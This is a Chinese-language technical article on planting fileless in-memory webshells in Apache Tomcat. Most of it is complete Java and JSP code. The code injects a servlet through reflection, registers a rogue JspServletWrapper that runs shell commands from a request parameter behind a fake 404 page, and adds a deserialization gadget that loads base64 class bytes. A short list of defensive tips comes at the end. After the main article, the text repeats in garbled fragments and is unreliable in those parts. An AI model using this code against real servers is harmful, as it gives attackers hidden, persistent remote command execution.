JSP型内存马技术分析与实现<\/h1>

前言<\/h2>
JSP型内存马是一种通过内存驻留技术实现的无文件WebShell，主要针对Tomcat容器的JSP处理机制进行攻击。本文详细分析两种实现JSP型内存马的技术思路，并提供完整的实现代码。<\/p>

技术原理<\/h2>

两种实现思路<\/h3>

反射关闭development属性<\/strong>：将Tomcat从开发模式转为生产模式<\/li>

修改Options对象的modificationTestInterval属性<\/strong>：改变Tomcat检查JSP更新的时间间隔<\/li> <\/ol>
这两种方法都是针对开发模式的修改，生产环境中JSP检查是通过checkInterval属性实现的。<\/p>
传统JSP处理流程的问题<\/h3>
传统JSP处理流程中，JspServlet#serviceJspFile<\/code>方法会检查JSP文件是否存在并装载wrapper，JspServletWrapper<\/code>类会因mustCompile<\/code>初始值为true而对JSP进行编译，导致文件落地。<\/p>
Servlet型内存马实现<\/h2> 基本实现代码<\/h3> <% Field reqF = request.getClass().getDeclaredField("request"); reqF.setAccessible(true); Request req = (Request)reqF.get(request); StandardContext context = (StandardContext)req.getContext(); Servlet servlet = new ServletTest(); \/\/ 继承Servlet类的子类 String name = servlet.getClass().getSimpleName(); org.apache.catalina.Wrapper newWrapper = context.createWrapper(); newWrapper.setName(name); newWrapper.setLoadOnStartup(1); newWrapper.setServlet(servlet); newWrapper.setServletClass(servlet.getClass().getName()); context.addChild(newWrapper); context.addServletMappingDecoded("\/cmd", name); %> <\/code><\/pre> JSP型内存马实现<\/h2> 核心思路<\/h3> 通过控制JspRuntimeContext<\/code>中的内容，使用addWrapper(String jspUri, JspServletWrapper jsw)<\/code>方法绑定映射规则，避免文件落地。<\/p> 完整实现代码<\/h3> <%@ page contentType="text\/html;charset=UTF-8" language="java" %> <%! class MemJspServletWrapper extends JspServletWrapper { public MemJspServletWrapper(ServletConfig config, Options options, JspRuntimeContext rctxt) { super(config, options, "", rctxt); \/\/ jspUri随便取值 } @Override public void service(HttpServletRequest request, HttpServletResponse response, boolean precompile) throws ServletException, IOException, FileNotFoundException { String cmd = request.getParameter("jspservlet"); if (cmd != null) { boolean isLinux = true; String osTyp = System.getProperty("os.name"); if (osTyp != null && osTyp.toLowerCase().contains("win")){ isLinux = false; } String[] cmds = isLinux ? new String[]{"\/bin\/sh", "-c", cmd} : new String[]{"cmd.exe", "\/c", cmd}; InputStream in = Runtime.getRuntime().exec(cmds).getInputStream(); Scanner s = new Scanner(in).useDelimiter("\\a"); String output = s.hasNext() ? s.next() : ""; PrintWriter out = response.getWriter(); out.println(output); out.flush(); out.close(); } else { \/\/ 伪造404页面 String msg = Localizer.getMessage("jsp.error.file.not.found", new Object[]{"\/tyskill.jsp"}); response.sendError(404, msg); } } } %> <% \/\/从request对象中获取request属性 Field _request = request.getClass().getDeclaredField("request"); _request.setAccessible(true); Request __request = (Request)_request.get(request); \/\/获取MappingData MappingData mappingData = __request.getMappingData(); \/\/获取Wrapper Field _wrapper = mappingData.getClass().getDeclaredField("wrapper"); _wrapper.setAccessible(true); Wrapper __wrapper = (Wrapper)_wrapper.get(mappingData); \/\/获取jspServlet对象 Field _jspServlet = __wrapper.getClass().getDeclaredField("instance"); _jspServlet.setAccessible(true); Servlet __jspServlet = (Servlet)_jspServlet.get(__wrapper); \/\/ 获取ServletConfig对象 Field _servletConfig = __jspServlet.getClass().getDeclaredField("config"); _servletConfig.setAccessible(true); ServletConfig __servletConfig = (ServletConfig)_servletConfig.get(__jspServlet); \/\/获取options中保存的对象 Field _option = __jspServlet.getClass().getDeclaredField("options"); _option.setAccessible(true); EmbeddedServletOptions __option = (EmbeddedServletOptions)_option.get(__jspServlet); \/\/ 获取JspRuntimeContext对象 Field _jspRuntimeContext = __jspServlet.getClass().getDeclaredField("rctxt"); _jspRuntimeContext.setAccessible(true); JspRuntimeContext __jspRuntimeContext = (JspRuntimeContext)_jspRuntimeContext.get(__jspServlet); JspServletWrapper memjsp = new MemJspServletWrapper(__servletConfig, __option, __jspRuntimeContext); __jspRuntimeContext.addWrapper("\/tyskill.jsp", memjsp); %> <\/code><\/pre> 反序列化注入内存马<\/h2> 实现代码<\/h3> import<\/span> com.sun.org.apache.xalan.internal.xsltc.DOM;<\/span> <\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.TransletException;<\/span> <\/span><\/span>import<\/span> com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;<\/span> <\/span><\/span>import<\/span> com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;<\/span> <\/span><\/span>import<\/span> com.sun.org.apache.xml.internal.serializer.SerializationHandler;<\/span> <\/span><\/span>import<\/span> org.apache.catalina.Container;<\/span> <\/span><\/span>import<\/span> org.apache.catalina.Wrapper;<\/span> <\/span><\/span>import<\/span> org.apache.catalina.core.StandardContext;<\/span> <\/span><\/span>import<\/span> org.apache.catalina.loader.WebappClassLoaderBase;<\/span> <\/span><\/span>import<\/span> org.apache.catalina.webresources.StandardRoot;<\/span> <\/span><\/span>import<\/span> org.apache.jasper.EmbeddedServletOptions;<\/span> <\/span><\/span>import<\/span> org.apache.jasper.Options;<\/span> <\/span><\/span>import<\/span> org.apache.jasper.compiler.JspRuntimeContext;<\/span> <\/span><\/span>import<\/span> org.apache.jasper.servlet.JspServletWrapper;<\/span> <\/span><\/span>import<\/span> javax.servlet.Servlet;<\/span> <\/span><\/span>import<\/span> javax.servlet.ServletConfig;<\/span> <\/span><\/span>import<\/span> java.util.HashMap;<\/span> <\/span><\/span> <\/span><\/span>public<\/span> class<\/span> InjectToJspServlet<\/span> extends<\/span> AbstractTranslet {<\/span> <\/span><\/span> private<\/span> static<\/span> final<\/span> String jsppath =<\/span> "\/tyskill.jsp"<\/span>;<\/span> <\/span><\/span> <\/span><\/span> public<\/span> InjectToJspServlet<\/span>()<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> WebappClassLoaderBase webappClassLoaderBase =<\/span> (<\/span>WebappClassLoaderBase)<\/span> Thread.<\/span>currentThread<\/span>().<\/span>getContextClassLoader<\/span>();<\/span> <\/span><\/span> StandardRoot standardroot =<\/span> (<\/span>StandardRoot)<\/span> webappClassLoaderBase.<\/span>getResources<\/span>();<\/span> <\/span><\/span> StandardContext standardContext =<\/span> (<\/span>StandardContext)<\/span> standardroot.<\/span>getContext<\/span>();<\/span> <\/span><\/span> <\/span><\/span> \/\/从StandardContext 基类 ContainerBase 中获取 children 属性 <\/span><\/span><\/span><\/span> HashMap<<\/span>String,<\/span> Container><\/span> _children =<\/span> (<\/span>HashMap<<\/span>String,<\/span> Container>)<\/span> getFieldValue(<\/span>standardContext,<\/span> "children"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/获取 Wrapper <\/span><\/span><\/span><\/span> Wrapper _wrapper =<\/span> (<\/span>Wrapper)<\/span> _children.<\/span>get<\/span>(<\/span>"jsp"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/获取jspServlet对象 <\/span><\/span><\/span><\/span> Servlet _jspServlet =<\/span> (<\/span>Servlet)<\/span> getFieldValue(<\/span>_wrapper,<\/span> "instance"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 获取ServletConfig对象 <\/span><\/span><\/span><\/span> ServletConfig _servletConfig =<\/span> (<\/span>ServletConfig)<\/span> getFieldValue(<\/span>_jspServlet,<\/span> "config"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/获取options中保存的对象 <\/span><\/span><\/span><\/span> EmbeddedServletOptions _option =<\/span> (<\/span>EmbeddedServletOptions)<\/span> getFieldValue(<\/span>_jspServlet,<\/span> "options"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 获取JspRuntimeContext对象 <\/span><\/span><\/span><\/span> JspRuntimeContext _jspRuntimeContext =<\/span> (<\/span>JspRuntimeContext)<\/span> getFieldValue(<\/span>_jspServlet,<\/span> "rctxt"<\/span>);<\/span> <\/span><\/span> <\/span><\/span> String clazzStr =<\/span> "..."<\/span>;<\/span> \/\/ 上面代码中MemJspServletWrapper类字节码的base64编码字符串 <\/span><\/span><\/span><\/span> byte<\/span>[]<\/span> classBytes =<\/span> java.<\/span>util<\/span>.<\/span>Base64<\/span>.<\/span>getDecoder<\/span>().<\/span>decode<\/span>(<\/span>clazzStr);<\/span> <\/span><\/span> ClassLoader classLoader =<\/span> Thread.<\/span>currentThread<\/span>().<\/span>getContextClassLoader<\/span>();<\/span> <\/span><\/span> java.<\/span>lang<\/span>.<\/span>reflect<\/span>.<\/span>Method<\/span> method =<\/span> ClassLoader.<\/span>class<\/span>.<\/span>getDeclaredMethod<\/span>(<\/span>"defineClass"<\/span>,<\/span> byte<\/span>[].<\/span>class<\/span>,<\/span> int<\/span>.<\/span>class<\/span>,<\/span> int<\/span>.<\/span>class<\/span>);<\/span> <\/span><\/span> method.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> Class clazz =<\/span> (<\/span>Class)<\/span> method.<\/span>invoke<\/span>(<\/span>classLoader,<\/span> classBytes,<\/span> 0<\/span>,<\/span> classBytes.<\/span>length<\/span>);<\/span> <\/span><\/span> <\/span><\/span> JspServletWrapper memjsp =<\/span> (<\/span>JspServletWrapper)<\/span> clazz.<\/span>getDeclaredConstructor<\/span>(<\/span>ServletConfig.<\/span>class<\/span>,<\/span> Options.<\/span>class<\/span>,<\/span> JspRuntimeContext.<\/span>class<\/span>)<\/span> <\/span><\/span> .<\/span>newInstance<\/span>(<\/span>_servletConfig,<\/span> _option,<\/span> _jspRuntimeContext);<\/span> <\/span><\/span> _jspRuntimeContext.<\/span>addWrapper<\/span>(<\/span>jsppath,<\/span> memjsp);<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception ignored)<\/span> {}<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> void<\/span> transform<\/span>(<\/span>DOM document,<\/span> SerializationHandler[]<\/span> handlers)<\/span> throws<\/span> TransletException {}<\/span> <\/span><\/span> <\/span><\/span> @Override<\/span> <\/span><\/span> public<\/span> void<\/span> transform<\/span>(<\/span>DOM document,<\/span> DTMAxisIterator iterator,<\/span> SerializationHandler handler)<\/span> throws<\/span> TransletException {}<\/span> <\/span><\/span> <\/span><\/span> private<\/span> static<\/span> Object getFieldValue<\/span>(<\/span>Object obj,<\/span> String fieldName)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> java.<\/span>lang<\/span>.<\/span>reflect<\/span>.<\/span>Field<\/span> declaredField;<\/span> <\/span><\/span> java.<\/span>lang<\/span>.<\/span>Class<\/span> clazz =<\/span> obj.<\/span>getClass<\/span>();<\/span> <\/span><\/span> while<\/span> (<\/span>clazz !=<\/span> Object.<\/span>class<\/span>)<\/span> {<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> declaredField =<\/span> clazz.<\/span>getDeclaredField<\/span>(<\/span>fieldName);<\/span> <\/span><\/span> declaredField.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span> return<\/span> declaredField.<\/span>get<\/span>(<\/span>obj);<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>Exception ignored){}<\/span> <\/span><\/span> clazz =<\/span> clazz.<\/span>getSuperclass<\/span>();<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> null<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>技术总结<\/h2> 技术不足<\/h3> 由于JSP的servlet处理类通常是JspServletWrapper<\/code>类，自定义实现容易被检测<\/li> 在MVC架构背景下应用场景有限<\/li> <\/ol> 版本差异<\/h3> Tomcat7: <%@ page import="org.apache.tomcat.util.http.mapper.MappingData" %><\/code><\/li> Tomcat8\/9: <%@ page import="org.apache.catalina.mapper.MappingData" %><\/code><\/li> <\/ul> 防御建议<\/h2> 监控JspRuntimeContext<\/code>的修改操作<\/li> 检查自定义JspServletWrapper<\/code>类的存在<\/li> 生产环境关闭development模式<\/li> 限制反序列化操作<\/li> <\/ol> 参考<\/h2> Java Object Searcher<\/a><\/li> <\/ul>

JSP型内存马技术分析与实现<\/h1>

前言<\/h2>
JSP型内存马是一种通过内存驻留技术实现的无文件WebShell，主要针对Tomcat容器的JSP处理机制进行攻击。本文详细分析两种实现JSP型内存马的技术思路，并提供完整的实现代码。<\/p>

技术原理<\/h2>

传统JSP处理流程的问题<\/h3>
传统JSP处理流程中，`JspServlet#serviceJspFile<\/code>方法会检查JSP文件是否存在并装载wrapper，JspServletWrapper<\/code>类会因mustCompile<\/code>初始值为true而对JSP进行编译，导致文件落地。<\/p>`

JSP型内存马实现<\/h2>

核心思路<\/h3>
通过控制`JspRuntimeContext<\/code>中的内容，使用addWrapper(String jspUri, JspServletWrapper jsw)<\/code>方法绑定映射规则，避免文件落地。<\/p>`

反序列化注入内存马<\/h2>

技术总结<\/h2>

防御建议<\/h2>

监控`JspRuntimeContext<\/code>的修改操作<\/li>`
`检查自定义JspServletWrapper<\/code>类的存在<\/li>`
`生产环境关闭development模式<\/li>`
`限制反序列化操作<\/li> <\/ol> 参考<\/h2> Java Object Searcher<\/a><\/li> <\/ul>`

参考<\/h2>

Java Object Searcher<\/a><\/li> <\/ul>

JSP型内存马技术分析与实现<\/h1>

前言<\/h2> JSP型内存马是一种通过内存驻留技术实现的无文件WebShell，主要针对Tomcat容器的JSP处理机制进行攻击。本文详细分析两种实现JSP型内存马的技术思路，并提供完整的实现代码。<\/p>

技术原理<\/h2>

传统JSP处理流程的问题<\/h3> 传统JSP处理流程中，JspServlet#serviceJspFile<\/code>方法会检查JSP文件是否存在并装载wrapper，JspServletWrapper<\/code>类会因mustCompile<\/code>初始值为true而对JSP进行编译，导致文件落地。<\/p>

JSP型内存马实现<\/h2>

核心思路<\/h3> 通过控制JspRuntimeContext<\/code>中的内容，使用addWrapper(String jspUri, JspServletWrapper jsw)<\/code>方法绑定映射规则，避免文件落地。<\/p>

反序列化注入内存马<\/h2>

技术总结<\/h2>

防御建议<\/h2> 监控JspRuntimeContext<\/code>的修改操作<\/li> 检查自定义JspServletWrapper<\/code>类的存在<\/li> 生产环境关闭development模式<\/li> 限制反序列化操作<\/li> <\/ol> 参考<\/h2> Java Object Searcher<\/a><\/li> <\/ul>

参考<\/h2> Java Object Searcher<\/a><\/li> <\/ul>

前言<\/h2>
JSP型内存马是一种通过内存驻留技术实现的无文件WebShell，主要针对Tomcat容器的JSP处理机制进行攻击。本文详细分析两种实现JSP型内存马的技术思路，并提供完整的实现代码。<\/p>

传统JSP处理流程的问题<\/h3>
传统JSP处理流程中，`JspServlet#serviceJspFile<\/code>方法会检查JSP文件是否存在并装载wrapper，JspServletWrapper<\/code>类会因mustCompile<\/code>初始值为true而对JSP进行编译，导致文件落地。<\/p>`

核心思路<\/h3>
通过控制`JspRuntimeContext<\/code>中的内容，使用addWrapper(String jspUri, JspServletWrapper jsw)<\/code>方法绑定映射规则，避免文件落地。<\/p>`

防御建议<\/h2>

监控`JspRuntimeContext<\/code>的修改操作<\/li>`
`检查自定义JspServletWrapper<\/code>类的存在<\/li>`
`生产环境关闭development模式<\/li>`
`限制反序列化操作<\/li> <\/ol> 参考<\/h2> Java Object Searcher<\/a><\/li> <\/ul>`

参考<\/h2>

Java Object Searcher<\/a><\/li> <\/ul>